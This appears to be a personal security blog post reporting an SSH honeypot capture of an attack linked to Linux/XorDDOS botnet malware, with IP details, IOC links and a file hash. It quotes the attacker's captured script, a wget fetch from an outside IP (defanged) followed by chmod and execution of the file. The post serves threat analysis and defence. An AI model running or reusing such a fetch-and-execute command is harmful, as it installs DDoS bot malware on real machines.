Kippo Honeypot Attack – Linux XorDDOS malware

So I have had my kippo honeypot running for a while and got some pretty good statistics from it. But after a while I got bored and turned it all off.
I decided to fire it back up again and got some interesting hits from 125.88.177.248.
It seems to be trying to execute some Linux/XorDDOS malware according to the guys over at malwaremustdie.org.

“…. the post-infection of this malware made the infected machine to act as bot, remotely controlled for malicious process, config, deny IP, daemon and configurations. They are using XOR’ed encryption communication, processes are sent with md5 encoded beforehand. The main function of this malware ELF is for a stealth DDoS attacker botnet.”

As you can see from my SIEM this IP is on the OTX register and its known as malicious
Basic Info of this IP is:-

Guangzhou, China

ASN/OWNER:AS58543 Guangdong

FIRST SEEN:Jan. 4, 2016, 8:31 am

LAST SEEN:Jan. 6, 2016, 7:26 am

https://otx.alienvault.com/indicator/ip/125.88.177.248/?utm_source=OSSIM&utm_medium=analysis%252Fsecurity_events%252Fsecurity_events&utm_campaign=5.2.0

SSH Kippo Honeypot

So we can see on the SIEM its detected the hits coming in, I’ve allowed the connection to pass the firewall as its going into my DMZ on a specific port.

It connects to the default honeypot admin/123456 login and tries the following command

“#! /bin/sh
PATH=$PATH: /usr/local/sbin: usr/local/bin: /usr/sbin: /usr/bin: /sbin: /bin
wget hXXp://107.178.93.23/abf/f13 (i’ve edited it to say hXXP so there isnt a live link)
chmod +x f13
./f13

by doing this its trying to to download a file from
107.178.93.23. This IP belongs to a godaddy host. IOFLOD(dot)com

and the chmod +x to give it permissions to then ./f13 to execute it.

One thing to note is that none of this is detected in Kippo-Graph, it only registers the connection from the IP.

SSH-connection

The next thing you can see is the below screenshot.
SSH-connection2

We then get a connection back again and the following commands are executed:-
“ls -la /var/run/gcc.pid”

SSH-connection3

This sounds very much like the malware they has been torn apart by MalwareMustDie.
http://blog.malwaremustdie.org/2015/06/mmd-0033-2015-linuxxorddos-infection_23.html

The files are also picked up by VirusTotal
https://www.virustotal.com/en/file/c394440c56fdcda9739fbb966e9ac2eab9e11e2eeff0720eb4c850a05b33eefc/analysis/

It seems to be trying to execute some Linux/XorDDOS malware according to the guys over at malwaremustdie.org